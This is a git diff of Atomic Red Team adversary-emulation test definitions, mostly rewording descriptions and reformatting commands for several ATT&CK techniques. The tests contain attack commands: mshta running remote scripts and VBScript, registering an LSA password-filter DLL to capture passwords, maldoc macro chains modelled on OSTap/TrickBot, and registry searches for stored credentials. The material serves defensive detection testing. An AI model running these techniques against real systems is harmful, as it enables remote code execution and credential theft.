diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index ca2d3c74..ba9e41e4 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -5,8 +5,7 @@ display_name: Mshta
 atomic_tests:
 - name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
   description: |
-    Test execution of a remote script using mshta.exe
-    Upon execution calc.exe will be launched
+    Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched.
   supported_platforms:
     - windows
   input_arguments:
@@ -20,39 +19,21 @@ atomic_tests:
     command: |
       mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
 
-- name: Mshta calls a local VBScript file to launch notepad.exe
-  description: Tests execution of a local program by a VBScript file called by Mshta
-
-  supported_platforms:
-    - windows
-
-  input_arguments:
-    local_file_path:
-      description: Create a local VBScript file
-      type: path
-      default: C:\Temp\mshta_notepad.vbs
-
-  executor:
-    name: command_prompt
-    command: |
-      mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run(""#{local_file_path}"")(window.close)")
-
 - name: Mshta executes VBScript to execute malicious command
   description: |
-    Run a local VB script to run local user enumeration powershell command
-
+    Run a local VB script to run local user enumeration powershell command.
     This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.
+    Upon execution, a new PowerShell windows will be opened that displays user information.
   supported_platforms:
     - windows
   executor:
     name: command_prompt
     command: |
-      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file $PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
+      mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit -file PathToAtomicsFolder\T1170\src\powershell.ps1"":close")
 
 - name: Mshta Executes Remote HTML Application (HTA)
   description: |
-    Execute an arbitrary remote HTA.
-    Upon execution calc.exe will be launched
+    Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
   supported_platforms:
     - windows
   input_arguments:
diff --git a/atomics/T1174/T1174.yaml b/atomics/T1174/T1174.yaml
index f655892d..83bc90d3 100644
--- a/atomics/T1174/T1174.yaml
+++ b/atomics/T1174/T1174.yaml
@@ -34,4 +34,4 @@ atomic_tests:
       $notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
       $notificationPackagesValues += $passwordFilterName
       Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
-      Restart-Computer -Confirm
\ No newline at end of file
+      Restart-Computer -Confirm
diff --git a/atomics/T1204/T1204.yaml b/atomics/T1204/T1204.yaml
index 3f7403ae..e70aaae9 100644
--- a/atomics/T1204/T1204.yaml
+++ b/atomics/T1204/T1204.yaml
@@ -5,7 +5,7 @@ display_name: User Execution
 atomic_tests:
 - name: OSTap Style Macro Execution
   description: |
-    This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. The .jse file in turn launches wscript.exe.
+    This Test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe.
     Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
 
     This is a known execution chain observed by the OSTap downloader commonly used in TrickBot campaigns
@@ -79,7 +79,7 @@ atomic_tests:
 
 - name: Maldoc choice flags command execution
   description: |
-    This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders
+    This Test uses a VBA macro to execute cmd with flags observed in recent maldoc and 2nd stage downloaders. Upon execution, CMD will be launched.
     Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
 
   supported_platforms:
@@ -118,6 +118,7 @@ atomic_tests:
 - name: OSTAP JS version
   description: |
     Malicious JavaScript executing CMD which spawns wscript.exe //e:jscript
+    
     Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-atomicredteam/blob/master/Public/Invoke-MalDoc.ps1) to load and execute VBA code into Excel or Word documents.
 
   supported_platforms:
diff --git a/atomics/T1214/T1214.yaml b/atomics/T1214/T1214.yaml
index d722f70b..23e94561 100644
--- a/atomics/T1214/T1214.yaml
+++ b/atomics/T1214/T1214.yaml
@@ -5,7 +5,7 @@ display_name: Credentials in Registry
 atomic_tests:
 - name: Enumeration for Credentials in Registry
   description: |
-    Queries to enumerate for credentials in the Registry.
+    Queries to enumerate for credentials in the Registry. Upon execution, any registry key containing the word "password" will be displayed.
 
   supported_platforms:
     - windows
@@ -19,7 +19,8 @@ atomic_tests:
 
 - name: Enumeration for PuTTY Credentials in Registry
   description: |
-    Queries to enumerate for PuTTY credentials in the Registry.
+    Queries to enumerate for PuTTY credentials in the Registry. PuTTY must be installed for this test to work. If any registry
+    entries are found, they will be displayed.
 
   supported_platforms:
     - windows
diff --git a/atomics/T1216/T1216.yaml b/atomics/T1216/T1216.yaml
index 6aa42647..42abe051 100644
--- a/atomics/T1216/T1216.yaml
+++ b/atomics/T1216/T1216.yaml
@@ -25,6 +25,7 @@ atomic_tests:
 - name: SyncAppvPublishingServer Signed Script PowerShell Command Execution
   description: |
     Executes the signed SyncAppvPublishingServer script with options to execute an arbitrary PowerShell command.
+    Upon execution, calc.exe will be launched.
 
   supported_platforms:
     - windows
diff --git a/atomics/T1217/T1217.yaml b/atomics/T1217/T1217.yaml
index 5ada6e07..ef1de2af 100644
--- a/atomics/T1217/T1217.yaml
+++ b/atomics/T1217/T1217.yaml
@@ -42,6 +42,7 @@ atomic_tests:
 - name: List Google Chrome Bookmarks on Windows with powershell
   description: |
     Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
+    Upon execution, paths that contain bookmark files will be displayed.
 
   supported_platforms:
     - windows
@@ -49,11 +50,12 @@ atomic_tests:
   executor:
     name: powershell
     command: |
-            where.exe /R C:\Users\ Bookmarks
+      Get-ChildItem -Path C:\Users\ -Filter Bookmarks -Recurse -ErrorAction SilentlyContinue -Force
 
-- name: List Google Chrome Bookmarks on Windows with command prompt
+- name: List Google Chrome Bookmarks on Windows with command prompt.
   description: |
     Searches for Google Chromes's Bookmarks file (on Windows distributions) that contains bookmarks.
+    Upon execution, paths that contain bookmark files will be displayed.
 
   supported_platforms:
     - windows
@@ -61,4 +63,4 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-            where /R C:\Users\ Bookmarks
+      where /R C:\Users\ Bookmarks